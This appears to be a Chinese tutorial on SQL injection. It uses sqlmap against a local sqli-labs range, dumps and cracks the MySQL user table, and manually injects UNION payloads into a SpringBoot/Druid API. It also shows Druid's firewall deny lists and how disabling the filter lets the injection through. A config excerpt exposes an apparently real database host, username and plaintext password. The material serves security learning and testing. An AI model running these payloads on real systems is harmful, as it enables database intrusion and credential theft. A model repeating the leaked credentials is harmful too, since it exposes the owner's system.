搭建sqli-Labs靶场
参照:https://blog.csdn.net/qq_41567696/article/details/140733516
安装注入工具sqlmap
参照:https://blog.csdn.net/qq_42321190/article/details/138534631
安装渗透扫描工具
appscan参照官网:https://www.appscan.net.cn/
nessus参照官网:http://www.tenable.com/products/nessus/select-your-operating-system
扫描漏洞(靶场漏洞已知,可以跳过这个过程)
使用appscan扫描网站漏洞,报告如下
sqlmap爆破靶场的注入漏洞演示
探测
PS D:\software\softwarefile\sqlmapproject-sqlmap-1.8.8-1-gedb9a15\sqlmapproject-sqlmap-edb9a15> python .\sqlmap.py -u http://localhost/sqli-labs/Less-1/?id=2 -batch ___ __H__ ___ ___[,]_____ ___ ___ {1.8.8.1#dev} |_ -| . ["] | .'| . | |___|_ [.]_|_|_|__,| _| |_|V... |_| https://sqlmap.org [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program [*] starting @ 15:17:27 /2024-08-23/ [15:17:27] [INFO] resuming back-end DBMS 'mysql' [15:17:27] [INFO] testing connection to the target URL sqlmap resumed the following injection point(s) from stored session: --- Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=2' AND 5551=5551 AND 'Fjso'='Fjso Type: error-based Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET) Payload: id=2' AND GTID_SUBSET(CONCAT(0x717a767171,(SELECT (ELT(7013=7013,1))),0x717a627171),7013) AND 'jFMF'='jFMF Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: id=2' AND (SELECT 7580 FROM (SELECT(SLEEP(5)))aHBV) AND 'pZbg'='pZbg Type: UNION query Title: Generic UNION query (NULL) - 3 columns Payload: id=-9175' UNION ALL SELECT NULL,NULL,CONCAT(0x717a767171,0x794e62524376556c706c4e7575565143754a61714d427462456d5556435a796464786f5a554a6778,0x717a627171)-- - --- [15:17:27] [INFO] the back-end DBMS is MySQL web application technology: Nginx 1.15.11, PHP 5.6.9 back-end DBMS: MySQL >= 5.6 [15:17:27] [INFO] fetched data logged to text files under 'C:\Users\jiangk\AppData\Local\sqlmap\output\localhost' [*] ending @ 15:17:27 /2024-08-23/查询数据库
PS D:\software\softwarefile\sqlmapproject-sqlmap-1.8.8-1-gedb9a15\sqlmapproject-sqlmap-edb9a15> python .\sqlmap.py -u http://localhost/sqli-labs/Less-1/?id=2 --dbs [*] starting @ 15:23:26 /2024-08-23/ [15:23:27] [INFO] resuming back-end DBMS 'mysql' [15:23:27] [INFO] testing connection to the target URL [15:23:27] [INFO] the back-end DBMS is MySQL web application technology: PHP 5.6.9, Nginx 1.15.11 back-end DBMS: MySQL >= 5.6 [15:23:27] [INFO] fetching database names available databases [7]: [*] challenges [*] information_schema [*] mysql [*] performance_schema [*] security [*] sys [*] test查表
PS D:\software\softwarefile\sqlmapproject-sqlmap-1.8.8-1-gedb9a15\sqlmapproject-sqlmap-edb9a15> python .\sqlmap.py -u http://localhost/sqli-labs/Less-1/?id=2 --tables -D "mysql" [*] starting @ 15:27:13 /2024-08-23/ [15:27:14] [INFO] resuming back-end DBMS 'mysql' [15:27:14] [INFO] testing connection to the target URL sqlmap resumed the following injection point(s) from stored session: [15:27:14] [INFO] the back-end DBMS is MySQL web application technology: PHP 5.6.9, Nginx 1.15.11 back-end DBMS: MySQL >= 5.6 [15:27:14] [INFO] fetching tables for database: 'mysql' Database: mysql [31 tables] +---------------------------+ | event | | plugin | | user | | columns_priv | | db | | engine_cost | | func | | general_log | | gtid_executed | | help_category | | help_keyword | | help_relation | | help_topic | | innodb_index_stats | | innodb_table_stats | | ndb_binlog_index | | proc | | procs_priv | | proxies_priv | | server_cost | | servers | | slave_master_info | | slave_relay_log_info | | slave_worker_info | | slow_log | | tables_priv | | time_zone | | time_zone_leap_second | | time_zone_name | | time_zone_transition | | time_zone_transition_type | +---------------------------+ [15:27:14] [INFO] fetched data logged to text files under 'C:\Users\jiangk\AppData\Local\sqlmap\output\localhost'查表字段
PS D:\software\softwarefile\sqlmapproject-sqlmap-1.8.8-1-gedb9a15\sqlmapproject-sqlmap-edb9a15> python .\sqlmap.py -u http://localhost/sqli-labs/Less-1/?id=2 --columns -T "user" -D "mysql" [*] starting @ 15:29:23 /2024-08-23/ [15:29:23] [INFO] resuming back-end DBMS 'mysql' [15:29:23] [INFO] testing connection to the target URL [15:29:23] [INFO] the back-end DBMS is MySQL web application technology: Nginx 1.15.11, PHP 5.6.9 back-end DBMS: MySQL >= 5.6 [15:29:23] [INFO] fetching columns for table 'user' in database 'mysql' Database: mysql Table: user [45 columns] +------------------------+-----------------------------------+ | Column | Type | +------------------------+-----------------------------------+ | Host | char(60) | | max_user_connections | int(11) unsigned | | plugin | char(64) | | User | char(32) | | account_locked | enum('N','Y') | | Alter_priv | enum('N','Y') | | Alter_routine_priv | enum('N','Y') | | authentication_string | text | | Create_priv | enum('N','Y') | | Create_routine_priv | enum('N','Y') | | Create_tablespace_priv | enum('N','Y') | | Create_tmp_table_priv | enum('N','Y') | | Create_user_priv | enum('N','Y') | | Create_view_priv | enum('N','Y') | | Delete_priv | enum('N','Y') | | Drop_priv | enum('N','Y') | | Event_priv | enum('N','Y') | | Execute_priv | enum('N','Y') | | File_priv | enum('N','Y') | | Grant_priv | enum('N','Y') | | Index_priv | enum('N','Y') | | Insert_priv | enum('N','Y') | | Lock_tables_priv | enum('N','Y') | | max_connections | int(11) unsigned | | max_questions | int(11) unsigned | | max_updates | int(11) unsigned | | password_expired | enum('N','Y') | | password_last_changed | timestamp | | password_lifetime | smallint(5) unsigned | | Process_priv | enum('N','Y') | | References_priv | enum('N','Y') | | Reload_priv | enum('N','Y') | | Repl_client_priv | enum('N','Y') | | Repl_slave_priv | enum('N','Y') | | Select_priv | enum('N','Y') | | Show_db_priv | enum('N','Y') | | Show_view_priv | enum('N','Y') | | Shutdown_priv | enum('N','Y') | | ssl_cipher | blob | | ssl_type | enum('','ANY','X509','SPECIFIED') | | Super_priv | enum('N','Y') | | Trigger_priv | enum('N','Y') | | Update_priv | enum('N','Y') | | x509_issuer | blob | | x509_subject | blob | +------------------------+-----------------------------------+ [15:29:23] [INFO] fetched data logged to text files under 'C:\Users\jiangk\AppData\Local\sqlmap\output\localhost' [*] ending @ 15:29:23 /2024-08-23/查用户表数据并尝试解密弱密码(尝试在线解密:https://www.cmd5.com/)
PS D:\software\softwarefile\sqlmapproject-sqlmap-1.8.8-1-gedb9a15\sqlmapproject-sqlmap-edb9a15> python .\sqlmap.py -u http://localhost/sqli-labs/Less-6/?id=2 --dump -C "User,authentication_string" -T "user" -D "mysql" [*] starting @ 15:30:34 /2024-08-23/ [15:30:35] [INFO] resuming back-end DBMS 'mysql' [15:30:35] [INFO] testing connection to the target URL sqlmap resumed the following injection point(s) from stored session: [15:30:35] [INFO] the back-end DBMS is MySQL web application technology: Nginx 1.15.11, PHP 5.6.9 back-end DBMS: MySQL >= 5.6 [15:30:35] [INFO] fetching entries of column(s) '`User`,authentication_string' for table 'user' in database 'mysql' [15:30:35] [INFO] resumed: 'mysql.session' [15:30:35] [INFO] resumed: '*THISISNOTAVALIDPASSWORDTHATCANBEUSEDHERE' [15:30:35] [INFO] resumed: 'mysql.sys' [15:30:35] [INFO] resumed: '*THISISNOTAVALIDPASSWORDTHATCANBEUSEDHERE' [15:30:35] [INFO] resumed: 'root' [15:30:35] [INFO] resumed: '*81F5E21E35407D884A6CD4A731AEBFB6AF209E1B' [15:30:35] [INFO] recognized possible password hashes in column 'authentication_string' do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] y [15:30:41] [INFO] writing hashes to a temporary file 'C:\Users\jiangk\AppData\Local\Temp\sqlmapas0muzv127312\sqlmaphashes-dasnqica.txt' do you want to crack them via a dictionary-based attack? [Y/n/q] y [15:30:44] [INFO] using hash method 'mysql_passwd' [15:30:44] [INFO] resuming password 'root' for hash '*81f5e21e35407d884a6cd4a731aebfb6af209e1b' Database: mysql Table: user [3 entries] +---------------+--------------------------------------------------+ | User | authentication_string | +---------------+--------------------------------------------------+ | mysql.session | *THISISNOTAVALIDPASSWORDTHATCANBEUSEDHERE | | mysql.sys | *THISISNOTAVALIDPASSWORDTHATCANBEUSEDHERE | | root | *81F5E21E35407D884A6CD4A731AEBFB6AF209E1B (root) | +---------------+--------------------------------------------------+ [15:30:44] [INFO] table 'mysql.`user`' dumped to CSV file 'C:\Users\jiangk\AppData\Local\sqlmap\output\localhost\dump\mysql\user.csv' [15:30:44] [INFO] fetched data logged to text files under 'C:\Users\jiangk\AppData\Local\sqlmap\output\localhost' [*] ending @ 15:30:44 /2024-08-23/
SpringBoot+Druid架构,手工注入漏洞演示
注入点:http://172.30.4.31:9690/jiangk_www/apimanager/c1303/api/querydepartment?type=1&areacode=130302
# 请求接口地址返回 {"code":"1","msg":"查询成功!","data":[{"pluscode":"130302011","name":"区房产局"},{"pluscode":"130302027","name":"区人防办"},{"pluscode":"130302028","name":"区建设局"},{"pluscode":"130302053","name":"区审批局"},{"pluscode":"130302061","name":"区住建局"},{"pluscode":"130302028","name":"区城建局"},{"pluscode":"130302010","name":"区规划局"},{"pluscode":"130302019","name":"区国土局"},{"pluscode":"130302003","name":"区民政局"},{"pluscode":"130302016","name":"区科技局"},{"pluscode":"130302032","name":"区畜牧局"},{"pluscode":"130302018","name":"区交通局"},{"pluscode":"130302014","name":"区农业局"},{"pluscode":"130302002","name":"区教育局"},{"pluscode":"130302013","name":"区粮食局"},{"pluscode":"130302026","name":"区编委办"},{"pluscode":"130302031","name":"区司法局"},{"pluscode":"130302025","name":"区人社局"},{"pluscode":"130302021","name":"区档案馆"},{"pluscode":"130302022","name":"区卫计局"},{"pluscode":"130302001","name":"区发改局"},{"pluscode":"130302030","name":"区地税局"},{"pluscode":"130302017","name":"区市政处"},{"pluscode":"130302015","name":"区财政局"},{"pluscode":"130302023","name":"区环保局"},{"pluscode":"130302004","name":"区文广新局"},{"pluscode":"130302009","name":"区水务局"},{"pluscode":"130302007","name":"区城管局"},{"pluscode":"130302008","name":"区市监局"},{"pluscode":"130302029","name":"区国税局"},{"pluscode":"130302012","name":"区公安局"},{"pluscode":"130302024","name":"区安监局"},{"pluscode":"130302006","name":"区园林局"},{"pluscode":"130302005","name":"区林业局"}]}注入测试
#请求地址:http://172.30.4.31:9690/jiangk_www/apimanager/c1303/api/querydepartment?type=1&areacode=130302' union select 1,2 from dual where rand()>'0 #返回数据最后包含了1,2数据对象 {"code":"1","msg":"查询成功!","data":[{"pluscode":"130302011","name":"区房产局"},{"pluscode":"130302027","name":"区人防办"},{"pluscode":"130302028","name":"区建设局"},{"pluscode":"130302053","name":"区审批局"},{"pluscode":"130302061","name":"区住建局"},{"pluscode":"130302028","name":"区城建局"},{"pluscode":"130302010","name":"区规划局"},{"pluscode":"130302019","name":"区国土局"},{"pluscode":"130302003","name":"区民政局"},{"pluscode":"130302016","name":"区科技局"},{"pluscode":"130302032","name":"区畜牧局"},{"pluscode":"130302018","name":"区交通局"},{"pluscode":"130302014","name":"区农业局"},{"pluscode":"130302002","name":"区教育局"},{"pluscode":"130302013","name":"区粮食局"},{"pluscode":"130302026","name":"区编委办"},{"pluscode":"130302031","name":"区司法局"},{"pluscode":"130302025","name":"区人社局"},{"pluscode":"130302021","name":"区档案馆"},{"pluscode":"130302022","name":"区卫计局"},{"pluscode":"130302001","name":"区发改局"},{"pluscode":"130302030","name":"区地税局"},{"pluscode":"130302017","name":"区市政处"},{"pluscode":"130302015","name":"区财政局"},{"pluscode":"130302023","name":"区环保局"},{"pluscode":"130302004","name":"区文广新局"},{"pluscode":"130302009","name":"区水务局"},{"pluscode":"130302007","name":"区城管局"},{"pluscode":"130302008","name":"区市监局"},{"pluscode":"130302029","name":"区国税局"},{"pluscode":"130302012","name":"区公安局"},{"pluscode":"130302024","name":"区安监局"},{"pluscode":"130302006","name":"区园林局"},{"pluscode":"130302005","name":"区林业局"},{"pluscode":"1","name":"2"}]}Druid的SQL防火墙进行了执行前检查,部分注入sql被拦截
# 注入时后台报错信息,请求地址:http://172.30.4.31:9690/jiangk_www/apimanager/c1303/api/querydepartment?type=1&areacode=130302' union select database(),2 from dual where rand()>'0 #后台报错信息 2024-08-23 16:43:49,269 WARN --- [qtp891193010-99] o.h.e.jdbc.spi.SqlExceptionHelper : SQL Error: 0, SQLState: null 2024-08-23 16:43:49,269 ERROR --- [qtp891193010-99] o.h.e.jdbc.spi.SqlExceptionHelper : sql injection violation, deny function : database : SELECT A.PLUSCODE, A.NAME FROM T_ORGANIZATION A WHERE LENGTH(PLUSCODE) = 9 and a.status='1' AND A.AREACODE = '130302' union select database(),2 from dual where rand()>'0' javax.persistence.PersistenceException: org.hibernate.exception.GenericJDBCException: could not prepare statement at org.hibernate.jpa.spi.AbstractEntityManagerImpl.convert(AbstractEntityManagerImpl.java:1692) at org.hibernate.jpa.spi.AbstractEntityManagerImpl.convert(AbstractEntityManagerImpl.java:1602) at org.hibernate.jpa.internal.QueryImpl.getResultList(QueryImpl.java:492) ...... ...省略 Caused by: org.hibernate.exception.GenericJDBCException: could not prepare statement at org.hibernate.exception.internal.StandardSQLExceptionConverter.convert(StandardSQLExceptionConverter.java:47) at org.hibernate.engine.jdbc.spi.SqlExceptionHelper.convert(SqlExceptionHelper.java:109) at org.hibernate.engine.jdbc.internal.StatementPreparerImpl$StatementPreparationTemplate.prepareStatement(StatementPreparerImpl.java:182) at org.hibernate.engine.jdbc.internal.StatementPreparerImpl.prepareQueryStatement(StatementPreparerImpl.java:148) at org.hibernate.loader.Loader.prepareQueryStatement(Loader.java:1929) at org.hibernate.loader.Loader.executeQueryStatement(Loader.java:1898) at org.hibernate.loader.Loader.executeQueryStatement(Loader.java:1876) at org.hibernate.loader.Loader.doQuery(Loader.java:919) at org.hibernate.loader.Loader.doQueryAndInitializeNonLazyCollections(Loader.java:336) at org.hibernate.loader.Loader.doList(Loader.java:2617) at org.hibernate.loader.Loader.doList(Loader.java:2600) at org.hibernate.loader.Loader.listIgnoreQueryCache(Loader.java:2429) at org.hibernate.loader.Loader.list(Loader.java:2424) at org.hibernate.loader.custom.CustomLoader.list(CustomLoader.java:336) at org.hibernate.internal.SessionImpl.listCustomQuery(SessionImpl.java:1967) at org.hibernate.internal.AbstractSessionImpl.list(AbstractSessionImpl.java:322) at org.hibernate.internal.SQLQueryImpl.list(SQLQueryImpl.java:125) at org.hibernate.jpa.internal.QueryImpl.list(QueryImpl.java:606) at org.hibernate.jpa.internal.QueryImpl.getResultList(QueryImpl.java:483) ... 103 more Caused by: java.sql.SQLException: sql injection violation, deny function : database : SELECT A.PLUSCODE, A.NAME FROM T_ORGANIZATION A WHERE LENGTH(PLUSCODE) = 9 and a.status='1' AND A.AREACODE = '130302' union select database(),2 from dual where rand()>'0' at com.alibaba.druid.wall.WallFilter.check(WallFilter.java:727) at com.alibaba.druid.wall.WallFilter.connection_prepareStatement(WallFilter.java:253) at com.alibaba.druid.filter.FilterChainImpl.connection_prepareStatement(FilterChainImpl.java:472) at com.alibaba.druid.filter.FilterAdapter.connection_prepareStatement(FilterAdapter.java:928) at com.alibaba.druid.filter.FilterEventAdapter.connection_prepareStatement(FilterEventAdapter.java:122) at com.alibaba.druid.filter.FilterChainImpl.connection_prepareStatement(FilterChainImpl.java:472) at com.alibaba.druid.proxy.jdbc.ConnectionProxyImpl.prepareStatement(ConnectionProxyImpl.java:342) at com.alibaba.druid.pool.DruidPooledConnection.prepareStatement(DruidPooledConnection.java:346) at org.hibernate.engine.jdbc.internal.StatementPreparerImpl$5.doPrepare(StatementPreparerImpl.java:146) at org.hibernate.engine.jdbc.internal.StatementPreparerImpl$StatementPreparationTemplate.prepareStatement(StatementPreparerImpl.java:172) ... 119 more1.开启后默认拦截的方法,加载配置在jar依赖里的文件名:deny-function.txt version load_file database schema user system_user session_user benchmark current_user sleep xmltype receive_message 2.开启后默认拦截的表,加载配置在jar依赖里的文件名:deny-schema.txt information_schema mysql performance_schemaDruid启用和关闭SQL防火墙的配置,spring.datasource.druid.filters
spring: datasource: druid: primary: url: jdbc:mysql://jumpserver.jiangk.com:33061/jiangk?useSSL=false username: 60c3f9da-53e1-4354-8c87-7e1a230006eb password: q55CGQYjdyNQI8W8 initial-size: 50 min-idle: 1 maxActive: 100 # 配置监控统计拦截的filters,wall是SQL防火墙,去掉后可以执行上文的注入SQL filters: stat,wall,log4j# 注入成功示例,访问地址:http://localhost:18080/jiangk_www/apimanager/c1303/api/querydepartment?type=1&areacode=130302' union select database(),2 from dual where rand()>'0 # 返回信息最后多了数据库名称 {"code":"1","msg":"查询成功!","data":[{"pluscode":"130302011","name":"区房产局"},{"pluscode":"130302027","name":"区人防办"},{"pluscode":"130302028","name":"区建设局"},{"pluscode":"130302053","name":"区审批局"},{"pluscode":"130302061","name":"区住建局"},{"pluscode":"130302028","name":"区城建局"},{"pluscode":"130302010","name":"区规划局"},{"pluscode":"130302019","name":"区国土局"},{"pluscode":"130302003","name":"区民政局"},{"pluscode":"130302016","name":"区科技局"},{"pluscode":"130302032","name":"区畜牧局"},{"pluscode":"130302018","name":"区交通局"},{"pluscode":"130302014","name":"区农业局"},{"pluscode":"130302002","name":"区教育局"},{"pluscode":"130302013","name":"区粮食局"},{"pluscode":"130302026","name":"区编委办"},{"pluscode":"130302031","name":"区司法局"},{"pluscode":"130302025","name":"区人社局"},{"pluscode":"130302021","name":"区档案馆"},{"pluscode":"130302022","name":"区卫计局"},{"pluscode":"130302001","name":"区发改局"},{"pluscode":"130302030","name":"区地税局"},{"pluscode":"130302017","name":"区市政处"},{"pluscode":"130302015","name":"区财政局"},{"pluscode":"130302023","name":"区环保局"},{"pluscode":"130302004","name":"区文广新局"},{"pluscode":"130302009","name":"区水务局"},{"pluscode":"130302007","name":"区城管局"},{"pluscode":"130302008","name":"区市监局"},{"pluscode":"130302029","name":"区国税局"},{"pluscode":"130302012","name":"区公安局"},{"pluscode":"130302024","name":"区安监局"},{"pluscode":"130302006","name":"区园林局"},{"pluscode":"130302005","name":"区林业局"},{"pluscode":"jiangk_test","name":"2"}]}